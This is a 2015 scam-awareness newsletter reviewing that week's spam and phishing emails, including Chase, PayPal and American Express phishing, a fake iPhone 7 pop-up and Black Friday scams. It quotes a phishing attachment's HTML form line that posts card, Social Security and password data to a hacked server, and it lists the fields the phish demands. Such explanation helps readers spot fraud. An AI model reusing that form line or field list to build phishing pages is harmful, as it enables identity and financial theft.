Please support our effort by making a small donation. Thank you!

x

December 1, 2015

THE WEEK IN REVIEW

We are really sick and tired of seeing and hearing two words. Can you guess what they are? We’ve seen at least a hundred scams with these two words together in the subject line or at the top of an email. Add these scams to the many hundreds of legitimate ads containing these two words and we’re done! Still can’t guess? Black Friday! Criminal gangs were trying really hard to sneak there scams into your inboxes amongst the legitimate advertisers. In fact, it was so bad during the past week that we made Black Friday this week’s Top Story (and threw some of the subject lines and email addresses into the lists below.)

URGENT WARNING: At the end of the week, we discovered that criminal gangs targeted people with newly created phishing scams designed to look like emails from Google.  All seemed to come from the address noreply@googlequery.co.uk.  We will report more fully on this scam in next week’s edition.

 

Sample Scam Subject Lines:

[UPDATE] Military Discussing Technology Release

Add egg protein to your foods quickly

Ditch- Coffee – For– This Super Natural Nutrient– From The Ocean

Do dust–pet -dandruff–and pollen — leave your family feeling miserable?

Don’t climb dangerous ladders to light your home

End of Season Patio Sale

Ending Friday Your CVS $50

Golf Video – See the “Straight Arrow” Swing

One trick to make Christmas magical

Re: Your CVS Black Friday $50 Credit

Re: Your Kohl’s Black Friday $50 Gift

See Online Deals on Electronics

Slash Your Gas-Bill by 80%

US News – Diabetes It’s a Lie

Sample Scam Email Addresses:

BlackFridaySavings@centransfer.download

CompareVALoans@drolly.top

CopperwearKneeReview@dovermar.space

EasyShedPlans@juanburma.date

EmailMarketing@diaghi.top

Holiday-Special@bkiti.top

LowCostMovers@easton.top

LungCancerTreatmentGuide@confering.top

PackagesFromSanta@crestria.top

SamsClubBlackFriday@cuteem.top

TimeShareSales@reptical.top

Walmart@cmspi.top

 

 

 

 

Phish NETS: Chase Online, PayPal and American Express

We saw a big jump in the phishing scams during the last week after a few quiet weeks. Yes, the criminals are targeting the three top targets –PayPal, American Express, and Apple. (We didn’t report on the Apple phishing scam below.) They’ve also targeted Chase Bank. Fortunately, recipients of the Chase Online phishing scam should be suspicious immediately because the email was sent from no-reply@che.com, not chase.com. Che.com is a strange website hosted in Zhechiang, China. And a simple mouse-over of the link “Log on to Chase Online” points to a website called akhirzaman.org, a religious website in Indonesia that has probably been hacked. Just out of curiosity we checked with VirusTotal.com about this Indonesian website and their results were clear. Stay away!

Now delete.

 

2-Phish-logon to chase online Vtotal

Once again PayPal was targeted in the next two phishing scams. It is obvious that neither of these emails came from paypal.com. The first came from service@servicelimited.info and the second from customer@com-information.info. Like the phishing scam above, a mouse-over of the first easily revealed that the scam pointed to the strange domain resolve.apk-limited.com, not paypal.com.

3a-PayPal-your account has been limited

However, a mouse-over of the link “Continue” in this 2nd phishing scam is harder for inexperienced netizens to see through. The link points to www.paypal.com.com-signin.info. This link is cleverly meant to appear like it is paypal.com but it is not. If you understand the domain naming system you know that the domain (and global top level domain) in this link is actually com-signin.info. A WHOIS lookup of this domain shows that it was registered on November 27 (the day the email was sent) through a proxy service to hide the real owner’s name. The “paypal.com” at the start of the link name actually represents two subdomains. A domain owner can create any subdomain he/she wants and this one cleverly tried to fool people into thinking the link pointed to the domain paypal.com. Hopefully recipients were very suspicious when they read the email content and saw grammatical and sentence construction errors. How many can you spot?

3b-Paypal login on your account

Next was another mediocre attempt trying to phish American Express accounts. The link for “View message” points to a daycare center website in Australia that has been hacked.

4-American Express -you have a new message

Finally, below is the most dangerous phish of the week and targeted American Express users again. You’ll notice that the email doesn’t contain a single website link and comes from a domain that sounds like it could belong to American Express but it doesn’t. The email was sent from aexp.com (though we don’t display that below). The attached file at the bottom of the email is a web document (.htm and .html files are web documents). We downloaded it and looked inside the code in the html document. The criminals ask for the following information from you in this web document:

“You must provide a valid 4-Digit Card (# printed just above the account number on the front of the Card”

Your name

Date of birth

Social Security number

Mother’s Maiden Name

Mother’s Date of Birth

Mother’s Place of Birth

Security pin

User login ID

Password

15 Digit Card Number

Expiration Date

4-Digit security code

Current Email address

Email password

Can you imagine providing this type of personal information to anyone? ….especially criminals? There are two things about the email that should raise your suspicions. Can you find them? (Answer at the bottom of this column.) We’re certain that the criminals who created this phishing scam have created others that we’ve reported on in the past year. We say this because their html code calls for images found deep on a hacked website in Portugal called jpmmotos.pt that we’ve identified in the past. Do you wonder where your precious data is being sent after hitting Submit in that html file? The file will post your information using this snippet of code. Can you find and figure out the 2-letter country code?

<form method=”post” action=”http://www.equipements-pro.com.tn//highslide/img/up-date.php” x_onsubmit=”check(this.form)”>

Your precious data will be sent to a hacked website called equipements-pro.com.tn. It is a website in Tunisia.

Delete!

Two reasons to be suspcious about the above email besides the attached html file…

  1. Grammatical error in the first paragraph
  2. The email is missing any personal information identifying you as the recipient, especially the last 4 digits of your account number

Your Money: Free iPhone 7

CONGRATULATIONS! Your was randomly selected to test the brand new iPhone 7!” One of our readers sent us a screenshot below taken on her iPhone which she immediately identified correctly as a scam. Who gives away iPhones? And the iPhone 7 is not thought to be coming out until the summer of 2016. So what’s going on here?

Notice the scammy website name at the top? Best-iphone6s.com. Google cannot find any such website for this domain, though the domain was registered with Enom on September 19th using a proxy service called WHOISGuard in Panama to hide the owner’s identity. (See the WHOIS record.) What makes this web page potentially dangerous is that you are presented with two choices… Yes and No. But on an i-device, such as an iPhone or Android, it is very difficult to identify malicious intent. Clicking either choice could install malware on your phone. It’s important not to click on either of the choices! If this pop-up happens to you, quit your browser without clicking anything. Next, go to your settings and clear out your browser cache. If you have an iPhone go to Settings > Safari > Clear History and Website Data.

A simple search for “Your was randomly selected to test the brand new iPhone 7” finds that many other people have reported these scams across the world, from Canada to Germany. Here are a couple more screenshots provided by Reddit users in this discussion thread: https://www.reddit.com/r/RelayForReddit/comments/3m8r9v/horrible_intrusive_and_annoying_ad/

7-iphone ad popup 8-iPhone ad popup 2

People on the Apple Discussion Boards have also been discussing these scams since July and as recently as last week. Visit https://discussions.apple.com/thread/7143380

Check out the number of links in a Google search for the above phrase during just the last month.

 

TOP STORY: Black Friday Deals that are Not

The criminal gangs that target us use many tricks to engineer a click. One of their standard tricks is to pitch their scams disguised as the holiday-du-jour special. Halloween, Valentine’s Day, Christmas, and of course, Black Friday. Each of the following emails below is meant to mislead recipients that they have an opportunity to take advantage of fantastic Black Friday deals. But they are all just wolves in sheep’s clothing and they are only a small sampling of the scams that targeted inboxes during the week before November 27. The first email is funny because it is trying to appeal to several holidays… Black Friday, Christmas, and Cyber Monday.

By the way… Should you ever receive emails you suspect are scams, never click on the “opt-out” option offered at the bottom of the email to stop more from being sent. Clicking “opt-out” is actually more likely to result in a computer infection or an increase in scam emails because you’ve just confirmed that you are a real person and will open their scams. For more information about unsubscribe scams read our article Unsubscribe Me Not!

9-Black Friday Amazon reward

10-Black Friday deals on electronics

11-Black Friday everyday deals12-Black Friday Walgreens reward

FOR YOUR SAFETY: Resume Attached from 163.com

We had never heard of 163.com until last week when it came to our attention from people who received the short, but dangerous emails below. 163.com is owned by NetEase, a China-based Internet company. As you can guess, each of the documents attached to the emails contain malware that will cause a computer infection. English is not the sender’s first language and all three were created and sent by the same scammer.

Delete!

 

 

14-Attach is my resume 2

15-Attach is my resume 3

 

 

ON THE LIGHTER SIDE: Good News From… Everyone???

We’re pleased to report that we have good news… again! We’re just not sure who to thank. Obviously our first thought was to thank “David Alder,” the sender of the email. But then we see that the news comes from, and is signed by, Ban Ki-Moon of the United Nations. So it would be appropriate to thank Mr. Ki-Moon. But we’re also told that this good news is all because of the “exit of” former U.S. Treasury Secretary Mr. Timothy Geitner and former FBI Director Robert Mueller. Should we thank them too? And we’re supposed to reply to banki4un@secretary.net. Oh well, we’ll thank them all and then wait for our $4.5 million dollars to arrive.

 

Until next week, surf safely!